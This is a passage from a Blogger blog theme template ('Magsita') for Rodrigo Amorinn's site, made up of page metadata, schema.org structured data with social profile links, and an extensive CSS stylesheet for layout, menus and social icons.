<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html b:css='false' b:defaultwidgetversion='2' b:layoutsVersion='3' b:responsive='true' b:templateVersion='1.0.0' expr:class='data:blog.languageDirection' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
  <head>   
    
    <meta content='width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1' name='viewport'/>
    <title><data:view.title.escaped/></title>
    <b:include data='blog' name='all-head-content'/>
    <meta content='index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1' name='robots'/>
    <meta content='index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1' name='googlebot'/>
    <meta content='Rodrigo Amorinn' name='author'/>
    <b:if cond='data:view.isPost'>
      <meta content='article' property='og:type'/>
    <b:else/>
      <meta content='website' property='og:type'/>
    </b:if>
    <meta content='summary_large_image' name='twitter:card'/>
    <meta expr:content='data:view.title.escaped' property='og:title'/>
    <meta expr:content='data:view.title.escaped' name='twitter:title'/>
    <meta expr:content='data:view.url.canonical' property='og:url'/>
    <b:if cond='data:view.description'>
      <meta expr:content='data:view.description.escaped' name='description'/>
      <meta expr:content='data:view.description.escaped' property='og:description'/>
      <meta expr:content='data:view.description.escaped' name='twitter:description'/>
    <b:elseif cond='data:blog.metaDescription'/>
      <meta expr:content='data:blog.metaDescription.escaped' name='description'/>
      <meta expr:content='data:blog.metaDescription.escaped' property='og:description'/>
      <meta expr:content='data:blog.metaDescription.escaped' name='twitter:description'/>
    <b:else/>
      <meta expr:content='data:blog.title.escaped' name='description'/>
      <meta expr:content='data:blog.title.escaped' property='og:description'/>
      <meta expr:content='data:blog.title.escaped' name='twitter:description'/>
    </b:if>
    <b:if cond='data:view.featuredImage'>
      <meta expr:content='resizeImage(data:view.featuredImage, 1200, &quot;1200:630&quot;)' property='og:image'/>
      <meta expr:content='resizeImage(data:view.featuredImage, 1200, &quot;1200:630&quot;)' name='twitter:image'/>
    </b:if>
    <b:if cond='data:view.isHomepage'>
      <script type='application/ld+json'>
      {
        &quot;@context&quot;: &quot;https://schema.org&quot;,
        &quot;@type&quot;: &quot;WebSite&quot;,
        &quot;name&quot;: &quot;<data:blog.title.escaped/>&quot;,
        &quot;url&quot;: &quot;<data:blog.homepageUrl.jsonEscaped/>&quot;,
        &quot;publisher&quot;: {
          &quot;@type&quot;: &quot;Person&quot;,
          &quot;name&quot;: &quot;Rodrigo Amorinn&quot;,
          &quot;url&quot;: &quot;<data:blog.homepageUrl.jsonEscaped/>&quot;
        },
        &quot;potentialAction&quot;: {
          &quot;@type&quot;: &quot;SearchAction&quot;,
          &quot;target&quot;: &quot;<data:blog.homepageUrl.jsonEscaped/>search?q={search_term_string}&quot;,
          &quot;query-input&quot;: &quot;required name=search_term_string&quot;
        }
      }
      </script>
      <script type='application/ld+json'>
      {
        &quot;@context&quot;: &quot;https://schema.org&quot;,
        &quot;@type&quot;: &quot;Person&quot;,
        &quot;name&quot;: &quot;Rodrigo Amorinn&quot;,
        &quot;url&quot;: &quot;<data:blog.homepageUrl.jsonEscaped/>&quot;,
        &quot;sameAs&quot;: [
          &quot;https://www.instagram.com/rodrigoamorinn&quot;,
          &quot;https://www.youtube.com/rodrigoamorinn&quot;,
          &quot;https://twitter.com/rodrigoamorinn&quot;,
          &quot;https://www.facebook.com/rodrigoamorinn&quot;
        ]
      }
      </script>
    </b:if>
   

    <!-- Google Fonts -->
    <link href='https://fonts.googleapis.com' rel='preconnect'/>
    <link crossorigin='anonymous' href='https://fonts.gstatic.com' rel='preconnect'/>
    <link href='https://stackpath.bootstrapcdn.com' rel='preconnect'/>
    <link href='//fonts.googleapis.com/css?family=Montserrat:400,400i,500,500i,600,600i,700,700i' media='all' rel='stylesheet' type='text/css'/>
    <link href='https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' rel='stylesheet'/>
  
<!-- Template Style CSS -->
<b:skin version='1.0.0'><![CDATA[/* 
-----------------------------------------------
Blogger Template Style
Name:        Magsita
License:     Free Version
Version:     1.0
Author:      Om Templates
Author Url:  https://www.omtemplates.com/
----------------------------------------------- */

/*
<!-- Variable definitions -->
<Variable name="keycolor" description="Main Color" type="color" default="$(main.color)" value="#077064"/>
<Variable name="followByEmail" description="Follow By Email Text" type="string" default="Get all latest content delivered straight to your inbox." value="Get all latest content delivered straight to your inbox."/>

<Group description="Theme Colors" selector="body">
 <Variable name="main.color" description="Theme Color" type="color" default="#ff749f" value="#239795"/>
  <Variable name="main.dark.color" description="Dark Color" type="color" default="#202020" value="#239795"/>
  <Variable name="menu.color" description="Menu Color" type="color" default="#ffffff" value="#cce1d7"/>
  <Variable name="title.color" description="Title Color" type="color" default="#333333" value="#239795"/>
  <Variable name="title.hover" description="Title Color on Hover" type="color" default="$(main.color)" value="#0ba896"/>
  <Variable name="footer.color" description="Footer Color" type="color" default="#f1ffff" value="#B7E1CD"/>
  <Variable name="headerfooter.color" description="Header Footer Color" type="color" default="#f1ffff" value="#B7E1CD"/>
</Group>

<Group description="Theme Body" selector="body">
  <Variable name="body.background.color" description="Body Background Color" type="color" default="#f8f8f8"  value="#f2f2f2"/>
  <Variable name="body.background" description="Background" type="background" color="$(body.background.color)" default="$(color) url() repeat fixed top left" value="#f2f2f2 url() repeat fixed top left"/>
  <Variable name="body.text.color" description="Text Color" type="color" default="#656565"  value="#114c4b"/>
  <Variable name="body.link.color" description="Link Color" type="color" default="$(main.color)"  value="#239795"/>
</Group>
 
<!-- Extra Variables -->
<Variable name="body.text.font" description="Font" hideEditor="true" type="font" default="13px Poppins, sans-serif"  value="13px Poppins, sans-serif"/>
<Variable name="posts.background.color" description="Post background color" hideEditor="true" type="color" default="#ffffff"  value="#ffffff"/>
<Variable name="tabs.font" description="Font 2" hideEditor="true" type="font" default="13px Poppins, sans-serif"  value="13px Poppins, sans-serif"/>
<Variable name="posts.title.color" description="Post title color" hideEditor="true" type="color" default="#333333"  value="#000000"/>
<Variable name="posts.text.color" description="Post text color" hideEditor="true" type="color" default="#656565"  value="#000000"/>
<Variable name="posts.icons.color" description="Post icons color" hideEditor="true" type="color" default="$(main.color)"  value="#ff749f"/>
<Variable name="labels.background.color" description="Label background color" hideEditor="true" type="color" default="$(main.color)"  value="#ff749f"/>
*/

 

/*-- Reset CSS --*/
#google_translate_element { clear: both; }.thread-expanded .thread-count a { display: none; }.comments .continue { display: none!important; } a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,font,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{padding:0;border:0;outline:0;vertical-align:baseline;background:0 0;text-decoration:none}
button,form,input,textarea{-webkit-appearance:none;-moz-appearance:none;appearance:none;border-radius:0}
dl,ul{list-style-position:inside;font-weight:400;list-style:none}
ul li{list-style:none}
caption,th{text-align:center}
img{border:none;position:relative}
a,a:visited{text-decoration:none}
.clearfix{clear:both}
.section,.widget,.widget ul{margin:0;padding:0}
.post-body a:visited{color:#00acee!important}
a{color:$(body.link.color)}
a img{border:0}
abbr{text-decoration:none}
.CSS_LIGHTBOX{z-index:999999!important}
.separator a{clear:none!important;float:none!important;margin-left:0!important;margin-right:0!important}
#navbar-iframe,.feed-links,.home-link,.widget-item-control,a.quickedit{display:none!important}
.center{display:table;margin:0 auto;position:relative}
.widget>h2,.widget>h3{display:none}
h3.home-title{padding:0 0 0 8px;border-left:5px solid #239795;position:relative;margin:0 0 30px;text-align:left;font-size:14px;color:#333;font-weight:600}
h3.home-title:after{position:absolute;top:35%;width:100%;height:8px;margin-left:15px;background:url(https://blogger.googleusercontent.com/img/a/AVvXsEjwVGCly30QE8X2IrdvAVpciFsPMtKZO45LVdA8kQdvwjVWmq9wCxTInvNjPBilekm_j30Dnl-mCAQyuW9YDTK2HvZLV8hREcBkMmXuLNVJumR2kOhTaczc4JZracWjxJy2LgyQtiZWIMuaRMUQVBPxL2VcDZh5Jw-8ynngQRGEnKQW9lgJeVwDBQm2=s16000);content:''}
body{background:$(body.background);background-color:$(body.background.color);font-family:'Montserrat',sans-serif;font-size:14px;font-weight:400;color:$(body.text.color);word-wrap:break-word;margin:0;padding:0}
#outer-wrapper{margin:0 auto;background-color:rgba(255,255,255,.74);box-shadow:0 16px 50px rgba(17,76,75,.12);backdrop-filter:blur(18px);-webkit-backdrop-filter:blur(18px)}
.row{margin:0 auto;width:1130px}
.home .row{width:100%}
#content-wrapper{margin:30px auto 40px;overflow:hidden}
#content-wrapper>.container{margin:0 -15px}
#main-wrapper{float:left;overflow:hidden;width:66.66666667%;box-sizing:border-box;word-wrap:break-word;padding:0 15px;margin:0}
.index #main-wrapper{width:100%}
.index #sidebar-wrapper{display:none}
.com-mix{padding:0 30px;box-sizing:border-box}
.item .com-mix{padding:0}
#sidebar-wrapper{float:right;overflow:hidden;width:33.33333333%;box-sizing:border-box;word-wrap:break-word;padding:0 15px}
.post-image-wrap{position:relative;display:block}
.about-author .avatar-container,.comments .avatar-image-container,.post-image-link{background-color:rgba(155,155,155,.07);color:transparent!important}
.post-thumb{transition:opacity .17s ease,transform .17s ease;display:block;position:relative;width:100%;height:100%;object-fit:cover;z-index:1;opacity:0;border-radius:2px;position:relative}
.post-thumb.lazy-yard{opacity:1}
.hot-item-inner:hover .post-image-link .post-thumb,.post-image-link:hover .post-thumb,.post-image-wrap:hover .post-image-link .post-thumb{opacity:.9}
.index-post .post-title a:hover{color:$(title.hover)}
.fold-shadow-right{position:absolute;z-index:2;width:20%;height:100%;background:url(https://blogger.googleusercontent.com/img/a/AVvXsEgr_UOuHsKZqaWa7rPvUXAu5-aqDOyEJkiJ-7huHRoEl_oTrnhZYKCrLdkfj3h4Q99cuEwbulfsOwf5FzbB0oInvKipVu896LvTSa718PD4AQhKZ49YNRbC3kMydBFzeRFVOI5L1pgoR6lPlPZ3pM_eIk_3uHv5vgNh9sqKUsCPmXCEwonIq1AIywLL=s16000);opacity:.3;pointer-events:none;background-size:contain}

/*-- Featured-wrapper CSS --*/


#featured-wrapper{margin-bottom:0}
#featured-wrapper .widget-title{display:none}
#featured-wrapper .post-tag{position:static;margin-bottom:8px;display:inline-block}
#featured-wrapper .jump-link.flat-button a{background-color:$(main.color);padding:5px 10px;display:inline-block;margin:10px 0;color:#fff}
#featured-wrapper .FeaturedPost .post-image-link{display:block;position:relative;width:100%;height:100vh;overflow:hidden}
#featured-wrapper .FeaturedPost .post-image-link:before{content:'';display:block;position:absolute;width:100%;top:0;bottom:0;background:-moz-linear-gradient(top,rgba(0,0,0,0) 0,rgba(0,0,0,1) 65%,rgba(0,0,0,1) 100%);background:-webkit-linear-gradient(top,rgba(0,0,0,0) 0,rgba(0,0,0,1) 65%,rgba(0,0,0,1) 100%);background:linear-gradient(to bottom,rgba(0,0,0,0) 0,rgba(0,0,0,1) 65%,rgba(0,0,0,1) 100%);opacity:.6;z-index:2}
#featured-wrapper .FeaturedPost .post-content{position:relative;overflow:hidden}
#featured-wrapper .FeaturedPost .post-info{box-sizing:border-box;width:565px;position:absolute;top:50%;left:0;right:0;margin:auto;padding:20px 25px;z-index:3;text-align:left;-webkit-transform:translateY(-50%)}
#featured-wrapper .FeaturedPost .post-title{font-size:24px;overflow:hidden;font-weight:600;line-height:1.5em;margin:0 0 15px}
#featured-wrapper .FeaturedPost .post-snippet{color:#fff;display:block;margin-bottom:8px}
#featured-wrapper .FeaturedPost .post-title a{color:#fff;display:block;transition:color .17s ease}
#featured-wrapper .FeaturedPost .post-title a:hover{color:$(title.hover)}
#featured-wrapper .FeaturedPost .post-tag {background-color:#000}
/*-- Hot-Wrapper CSS --*/



#hot-wrapper{margin:0 auto 30px}
#hot-wrapper h3{border-left:5px solid #077064;display:-webkit-box;overflow:hidden;position:relative;margin:0 0 30px;text-align:left;font-size:24px;color:#333;font-weight:600;padding:0 0 0 8px}
#hot-wrapper h3:after{position:absolute;top:35%;width:100%;height:8px;margin-left:15px;background:url(https://blogger.googleusercontent.com/img/a/AVvXsEjwVGCly30QE8X2IrdvAVpciFsPMtKZO45LVdA8kQdvwjVWmq9wCxTInvNjPBilekm_j30Dnl-mCAQyuW9YDTK2HvZLV8hREcBkMmXuLNVJumR2kOhTaczc4JZracWjxJy2LgyQtiZWIMuaRMUQVBPxL2VcDZh5Jw-8ynngQRGEnKQW9lgJeVwDBQm2=s16000);content:''}
#hot-section .show-hot{display:block!important}
#hot-section .show-hot .widget-content{height:400px;position:relative;overflow:hidden;margin:0}
.hot-loader{position:relative;height:100%;overflow:hidden;display:block}
.hot-loader:after{content:'';position:absolute;top:50%;left:50%;width:26px;height:26px;margin:-15px 0 0 -15px;border:2px solid #ddd;border-left-color:$(main.color);border-top-color:$(main.color);border-radius:100%;animation:spinner .8s infinite linear;transform-origin:center}
@-webkit-keyframes spinner {
0%{-webkit-transform:rotate(0);transform:rotate(0)}
to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}
}
@keyframes spinner {
0%{-webkit-transform:rotate(0);transform:rotate(0)}
to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}
}
li.hot-item.item-0{margin-bottom:0}
li.hot-item.item-3{margin-bottom:0}
li.hot-item.item-0 .post-info{padding:15px;width:100%;position:absolute}
.hot-posts .hot-item{margin-bottom:20px;float:left;width:50%;position:relative;height:auto;overflow:hidden;box-sizing:border-box;padding:0 8px}
.hot-item-inner{position:relative;float:left;width:100%;height:100%;overflow:hidden;display:block}
.hot-item.item-0 .post-image-link{height:400px;width:100%}
.hot-posts .post-image-link{float:left;width:85px;height:120px;position:relative;overflow:hidden;display:block}
.hot-posts .post-info{bottom:0;left:0;overflow:hidden;z-index:5;box-sizing:border-box}
.hot-posts .post-title{color:#333;font-size:16px;font-weight:600;display:block;line-height:1.5em;margin:0 0 5px 10px;text-transform:initial}
.hot-posts .item-0 .post-title{color:#fff;font-size:20px;margin:10px 0}
.hot-posts .item-0 .post-title a{color:#fff}
.hot-posts .post-title a{color:#333;display:block}
.hot-posts .post-title a:hover{color:$(title.hover)}
.hot-posts .post-meta,.hot-posts .post-meta a{color:#aaa;display:inline-block}
.show-hot .no-posts{position:absolute;top:calc(50% - 50px);left:0;width:100%}




/*-- Count-Wrapper CSS --*/




/*-- Top-Wrapper CSS --*/


#top-bar{padding:0;background:#333;position:unset}
.home #top-bar{padding:0 20px;box-sizing:border-box;position:absolute;background:transparent;width:100%;height:90px;display:block}
#combo-up{float:none;width:100%;margin:0 auto;position:unset}
.home #combo-up{position:fixed;width:50%;box-sizing:border-box;float:left}
#combo-down{float:none;width:100%;margin:0 auto;position:unset}
.home #combo-down{position:relative;width:50%;float:right;box-sizing:border-box}
#top-bar .container{position:relative;height:90px;text-align:center;margin:0 auto}
.top-bar-nav{transform:translateY(0);-webkit-transform:translateY(0);-moz-transform:translateY(0);position:absolute;left:0;display:none}
.top-bar-nav .widget>.widget-title{display:none}
.top-bar-nav ul li{float:left}
.top-bar-nav ul li>a{letter-spacing:.2px;height:70px;display:block;color:#000;font-size:13px;font-weight:500;line-height:70px;text-transform:capitalize;margin:0 0 0 15px;padding:0;transition:color .17s}
.top-bar-nav ul li>a>i{vertical-align:middle;margin-right:6px;position:relative;top:-1px}
.top-bar-nav ul li:first-child>a{padding:0 5px 0 0;margin:0}
.top-bar-nav ul>li:hover>a{color:$(main.color)}
.top-bar-social{transform:translateY(0);-webkit-transform:translateY(0);-moz-transform:translateY(0);top:0;right:0}
.top-bar-social .widget>.widget-title{display:none}
.top-bar-social ul>li{display:inline-block}
.top-bar-social ul>li>a{display:block;color:#000!important;text-decoration:none;font-size:18px;text-align:center;padding:0 5px;margin:0 15px 0 0;transition:color .17s}
.top-bar-social ul>li:last-child>a{padding:0;margin:0}
.top-bar-social ul>li:hover>a{color:$(main.color)}
.top-bar-social.social.mobile-social ul>li:hover>a{color:$(main.dark.color)}
.mobile-menu .top-bar-nav ul li a,.mobile-menu .top-bar-social ul li a{line-height:35px;display:block}
.mobile-menu .top-bar-nav ul li,.mobile-menu .top-bar-social ul li{width:auto;display:inline-block}
.mobile-menu .top-bar-nav,.mobile-menu .top-bar-social{height:35px;text-align:left}
.social-counter .facebook a{background-color:#3b5999}
.social-counter .twitter a{background-color:#00acee}
.social-counter .gplus a{background-color:#db4a39}
.social-counter .youtube a{background-color:#f50000}
.social-counter .instagram a{background:linear-gradient(15deg,#ffb13d,#dd277b,#4d5ed4)}
.social-counter .pinterest a{background-color:#ca2127}
.social-counter .dribbble a{background-color:#ea4c89}
.social-counter .linkedin a{background-color:#0077b5}
.social-counter .tumblr a{background-color:#365069}
.social-counter .twitch a{background-color:#6441a5}
.social-counter .rss a{background-color:#ffc200}
.social-counter .skype a{background-color:#00aff0}
.social-counter .stumbleupon a{background-color:#eb4823}
.social-counter .vk a{background-color:#4a76a8}
.social-counter .stack-overflow a{background-color:#f48024}
.social-counter .github a{background-color:#24292e}
.social-counter .soundcloud a{background:linear-gradient(#ff7400,#ff3400)}
.social-counter .behance a{background-color:#191919}
.social-counter .digg a{background-color:#1b1a19}
.social-counter .delicious a{background-color:#0076e8}
.social-counter .codepen a{background-color:#000}
.social-counter .reddit a{background-color:#ff4500}
.social-counter .whatsapp a{background-color:#3fbb50}
.social-counter .snapchat a{background-color:#ffe700}
.social-counter .email a{background-color:#888}
.social-counter .external-link a{background-color:#202020}
.social a:before{display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400}
.social .blogger a:before{content:"\f37d"}
.social .facebook a:before{content:"\f09a"}
.social .twitter a:before{content:"\f099"}
.social .gplus a:before{content:"\f0d5"}
.social .rss a:before{content:"\f09e"}
.social .youtube a:before{content:"\f167"}
.social .skype a:before{content:"\f17e"}
.social .stumbleupon a:before{content:"\f1a4"}
.social .tumblr a:before{content:"\f173"}
.social .vk a:before{content:"\f189"}
.social .stack-overflow a:before{content:"\f16c"}
.social .github a:before{content:"\f09b"}
.social .linkedin a:before{content:"\f0e1"}
.social .dribbble a:before{content:"\f17d"}
.social .soundcloud a:before{content:"\f1be"}
.social .behance a:before{content:"\f1b4"}
.social .digg a:before{content:"\f1a6"}
.social .instagram a:before{content:"\f16d"}
.social .pinterest a:before{content:"\f0d2"}
.social .twitch a:before{content:"\f1e8"}
.social .delicious a:before{content:"\f1a5"}
.social .codepen a:before{content:"\f1cb"}
.social .reddit a:before{content:"\f1a1"}
.social .whatsapp a:before{content:"\f232"}
.social .snapchat a:before{content:"\f2ac"}
.social .email a:before{content:"\f0e0"}
.social .external-link a:before{content:"\f35d"}
.social-color .blogger a{background-color:#ff5722}
.social-color .facebook a{background-color:#3b5999}
.social-color .twitter a{background-color:#00acee}
.social-color .gplus a{background-color:#db4a39}
.social-color .youtube a{background-color:#f50000}
.social-color .instagram a{background:linear-gradient(15deg,#ffb13d,#dd277b,#4d5ed4)}
.social-color .pinterest a{background-color:#ca2127}
.social-color .dribbble a{background-color:#ea4c89}
.social-color .linkedin a{background-color:#0077b5}
.social-color .tumblr a{background-color:#365069}
.social-color .twitch a{background-color:#6441a5}
.social-color .rss a{background-color:#ffc200}
.social-color .skype a{background-color:#00aff0}
.social-color .stumbleupon a{background-color:#eb4823}
.social-color .vk a{background-color:#4a76a8}
.social-color .stack-overflow a{background-color:#f48024}
.social-color .github a{background-color:#24292e}
.social-color .soundcloud a{background:linear-gradient(#ff7400,#ff3400)}
.social-color .behance a{background-color:#191919}
.social-color .digg a{background-color:#1b1a19}
.social-color .delicious a{background-color:#0076e8}
.social-color .codepen a{background-color:#000}
.social-color .reddit a{background-color:#ff4500}
.social-color .whatsapp a{background-color:#3fbb50}
.social-color .snapchat a{background-color:#ffe700}
.social-color .email a{background-color:#888}
.social-color .external-link a{background-color:$(main.dark.color)}

/*-- Header-Wrapper CSS --*/

#header-wrap{position:relative;margin:0}
.header-header{text-align:center;background-color:#fff;width:100%;height:70px;position:relative;overflow:hidden;padding:30px 0 0}
.header-headers{text-align:center;background-color:#fff;width:100%;position:relative;overflow:hidden;margin-top:30px;margin-bottom:30px}
#header-wrap .header-header{padding-bottom:30px}
.header-header .container{position:relative;margin:0 auto}
.header-logo{z-index:10;float:left;padding:19px 0;display:inline-block;position:relative;width:auto;max-width:100%;max-height:120px;margin:0}
.header-logo .header-image-wrapper{display:block;max-height:60px;height:100%}
.header-logo img{max-width:100%;max-height:120px;margin:0; top:-20px}
.header-logo h1{color:$(title.color);font-size:15px;margin:0;line-height:60px;}
.header-logo p{font-size:12px;margin:5px 0 0}
.header-ads{position:relative}
.header-ads .widget>.widget-title{display:none}
.header-ads .widget{max-width:100%}
.header-ads .widget .widget-content{width:100%;max-width:100%;max-height:90px;line-height:1}
.post-info{margin:0px 0 0}


/*============ 2. Preloader ============*/


.preloader {
width: 100%;
height: 100%;
position: fixed;
background: #fff;
z-index: 9999;
}
.sk-three-bounce{width:80px;text-align:center;left:50%;top:50%;position:absolute;transform:translate(-50%,-50%) matrix(1,0,0,1,0,0)}
.sk-three-bounce .sk-child {
width: 20px;
height: 20px;
background-color:$(main.color);
border-radius: 100%;
display: inline-block;
-webkit-animation: sk-three-bounce 1.4s ease-in-out 0s infinite both;
animation: sk-three-bounce 1.4s ease-in-out 0s infinite both;
}
.sk-three-bounce .sk-bounce1 {
-webkit-animation-delay: -0.32s;
animation-delay: -0.32s;
}
.sk-three-bounce .sk-bounce2 {
-webkit-animation-delay: -0.16s;
animation-delay: -0.16s;
}
@-webkit-keyframes sk-three-bounce {
0%, 80%, 100% {
-webkit-transform: scale(0);
transform: scale(0);
}
40% {
-webkit-transform: scale(1);
transform: scale(1);
}
}
@keyframes sk-three-bounce {
0%, 80%, 100% {
-webkit-transform: scale(0);
transform: scale(0);
}
40% {
-webkit-transform: scale(1);
transform: scale(1);
}
}



.footer-menu{position:absolute;bottom:0}
.footer-menu ul li:first-child a{margin:0}




/*-- Lower-Wrapper CSS --*/


.lower-menu{height:34px;line-height:34px;display:inline-block;float:right}.lower-menu ul li{display:inline-block}.lower-menu ul li a{color:#fff;font-size:13px;padding:0 10px 0 0;display:block;letter-spacing:.2px}.lower-menu ul li a:hover{color:$(title.hover)}.lower-menu ul li:last-child a{padding-right:0}




/*-- Menu-Wrapper CSS --*/


.header-menu{float:right;text-align:center;display:inline-block;height:90px;z-index:10;font-size:13px;margin:0}
.header-menu .container{position:relative;margin:0 auto;padding:0;background-color:$(main.color)}
#main-menu .widget,#main-menu .widget > .widget-title{display:none}
#main-menu .show-menu{display:block}
.home #main-menu{display:none;height:90px;z-index:15}
#main-menu{display:block}
#main-menu ul > li{text-align:left;float:left;position:relative;margin:0;padding:0;transition:background .17s}
#main-menu ul > li > a{position:relative;color:#fff;font-size:14px;font-weight:600;line-height:90px;display:inline-block;margin:0;padding:0 13px;transition:color .17s ease}
#main-menu ul > li:last-child > a{padding-right:0px}
#main-menu ul > li > a > i,.mobile-menu ul li a i{vertical-align:middle;margin-right:6px;position:relative;top:-1px}
#main-menu ul > li > ul{position:absolute;float:left;left:0;top:90px;width:190px;background-color:$(main.dark.color);z-index:99999;margin:0;padding:0;box-shadow:0 3px 5px rgba(0,0,0,0.2);visibility:hidden;opacity:0}
#main-menu ul > li > ul > li > ul{position:absolute;float:left;top:0;left:100%;margin:0}
#main-menu ul > li > ul > li{display:block;float:none;position:relative;transition:all .17s ease}
#main-menu ul > li > ul > li a{display:block;height:36px;font-size:12px;color:#33ffff;line-height:36px;box-sizing:border-box;margin:0;padding:0 15px;transition:all .17s ease}
#main-menu ul > li > ul > li:hover{background-color:rgba(0,0,0,0.2)}
#main-menu ul > li > ul > li:hover > a{background-color:$(main.color);color:#fff}
#main-menu ul > li.has-sub > a:after{content:"\f107";float:right;font-family:FontAwesome;font-size:14px;font-weight:400;margin:0 0 0 3px}
#main-menu ul > li > ul > li.has-sub > a:after{content:"\f105";float:right;margin:0}
#main-menu .mega-menu{position:static!important}
#main-menu .mega-menu > ul{width:100%;box-sizing:border-box;padding:20px 10px}
#main-menu .mega-menu > ul.mega-menu-inner{overflow:hidden}
#main-menu ul > li:hover > ul,#main-menu ul > li > ul > li:hover > ul{visibility:visible;opacity:1;color:#fff}
#main-menu ul ul{transition:all .17s ease}
.mega-menu-inner .mega-item{float:left;width:25%;box-sizing:border-box;padding:0 10px}
.mega-menu-inner .mega-content{position:relative;width:100%;overflow:hidden;padding:0}
.mega-content .post-image-wrap{width:100%;height:140px;overflow:hidden}
.mega-content .post-image-link{width:100%;height:100%;z-index:1;display:block;position:relative;overflow:hidden}
.mega-content .post-title{position:relative;font-size:14px;font-weight:600;line-height:1.5em;margin:10px 0 7px}
.mega-content .post-title a{display:block;color:#000;transition:color .17s}
.mega-content:hover .post-title a{color:$(title.hover)}
.mega-content .post-meta{color:#aaa}
.no-posts{float:left;width:100%;height:100px;line-height:100px;text-align:center}
.mega-menu .no-posts{line-height:60px;color:$(title.color)}
.hide-search,.show-search{position:absolute;right:0;top:0;display:none;width:48px;height:48px;line-height:48px;z-index:20;color:$(menu.color);font-size:15px;text-align:center;cursor:pointer;transition:color .17s ease}
.show-search:before{content:"\f002";font-family:FontAwesome;font-weight:400}
.hide-search:before{content:"\f00d";font-family:FontAwesome;font-weight:400}
.hide-search:hover,.show-search:hover{color:#fff}
#nav-search{display:none;position:absolute;left:0;top:0;width:100%;height:48px;z-index:99;background-color:$(main.color);box-sizing:border-box;padding:0}
#nav-search .search-form{width:100%;height:48px;background-color:rgba(0,0,0,0);line-height:48px;overflow:hidden;padding:0}
#nav-search .search-input{width:100%;height:48px;font-family:inherit;color:$(menu.color);margin:0;padding:0 70px 0 15px;background-color:rgba(0,0,0,0);font-size:14px;font-weight:400;box-sizing:border-box;border:0}
#nav-search .search-input:focus{color:$(menu.color);outline:0}
.home .slide-menu-toggle{display:block;position:absolute;line-height:90px;height:90px;width:48px;top:0;right:0;font-family:FontAwesome;color:#000;font-size:17px;font-weight:400;cursor:pointer;z-index:4;padding:0}
.index .slide-menu-toggle:before{color:#fff;border-radius:100%;width:50px;height:50px;background:$(main.color);padding:10px 12px}
.slide-menu-toggle{display:none}

.item #main-menu{display:block}
.slide-menu-toggle:before{content:"\f0c9";background:none}
.nav-active .slide-menu-toggle:before{content:"\f00d"}
.top-bar-social.social.mobile-social{display:none}
.mobile-menu{display:block;z-index:1515;position:fixed;top:0;left:0;width:300px;height:100%;overflow:auto;background-color:$(main.dark.color);box-sizing:border-box;padding:20px;border-top:1px solid rgba(255,255,255,0.08);-webkit-transform:translateX(-100%);transform:translateX(-100%);visibility:hidden;opacity:0;transition:all .17s ease}
.overlay{visibility:hidden;opacity:0;position:fixed;top:0;left:0;right:0;bottom:0;margin:0;z-index:1010;cursor:url(https://1bp.blogspot.com/-Qk8NIw5AYmk/XNn5Q3mmaZI/AAAAAAAAEx0/AVVnXOaLDMwtgOlWwjYlza9WLZk0_TiRgCK4BGAYYCw/s1600/close-white.png),default;background-color:rgba(23,28,36,0.6);-webkit-backdrop-filter:saturate(100%) blur(3px);-ms-backdrop-filter:saturate(100%) blur(3px);-o-backdrop-filter:saturate(100%) blur(3px);backdrop-filter:saturate(100%) blur(3px);transition:all .25s ease}
.menu-close-button{position:absolute;right:0;top:0;width:35px;height:35px;line-height:35px;background-color:$(main.color);text-align:center;color:#fff;cursor:pointer}
.menu-close-button:before{content:"\f00d";font-family:FontAwesome;font-weight:400}
.nav-active .mobile-menu{visibility:visible;opacity:1;transform:scaleY(1)}
.mobile-menu > ul{margin:0}
.mobile-menu .m-sub{display:none;padding:0}
.mobile-menu ul li{text-align:left;position:relative;display:block;overflow:hidden;float:left;width:100%;font-size:13px;font-weight:500;text-transform:uppercase;line-height:38px;margin:0;padding:0}
.mobile-menu > ul li ul{overflow:hidden}
.mobile-menu ul li a{color:#95e7e6;padding:0;display:block;transition:all .17s ease}
.mobile-menu ul li.has-sub .submenu-toggle{position:absolute;top:0;right:0;color:#00095e7e6;cursor:pointer}
.mobile-menu ul li.has-sub .submenu-toggle:after{content:"\f105";font-family:FontAwesome;font-weight:400;float:right;width:34px;font-size:16px;text-align:center;transition:all .17s ease}
.mobile-menu ul li.has-sub.show > .submenu-toggle:after{transform:rotate(90deg)}
.mobile-menu > ul > li > ul > li > a{color:#000;opacity:.7;padding:0 0 0 15px}
.mobile-menu > ul > li > ul > li > ul > li > a{color:#000;opacity:.7;padding:0 0 0 30px}
.mobile-menu ul li a:hover,.mobile-menu ul > li > .submenu-toggle:hover{color:#47d5d3;}



/*-- Post-meta CSS --*/



.top-bar-social.social.mobile-social ul{margin:0}
.post-meta{overflow:hidden;font-size:11px;font-weight:500;text-transform:uppercase;padding:0 1px}
.post-meta .post-author,.post-meta .post-date{display:inline-block;margin:0 10px 0 0}
.post-author a{color:#333}
.FeaturedPost .post-date{float:none}
.post-meta .post-author:before,.post-meta .post-date:before{font-family:FontAwesome;font-weight:400;margin:0 3px 0 0}
.post-meta .post-author:before{content:'\f007'}
.post-meta .post-date:before{content:'\f017'}
.post-meta a{transition:color .17s}
.post-meta a:hover{color:$(title.color)}
#combo{overflow:hidden;box-sizing:border-box;border-radius:8px;background:rgba(255,255,255,.68);border:1px solid rgba(255,255,255,.58);box-shadow:0 14px 35px rgba(17,76,75,.10);backdrop-filter:blur(16px);-webkit-backdrop-filter:blur(16px)}
.queryMessage{overflow:hidden;background-color:#f2f2f2;color:$(title.color);font-size:13px;font-weight:400;padding:8px 10px;margin:0 0 25px}
.queryMessage .query-info{margin:0 5px}
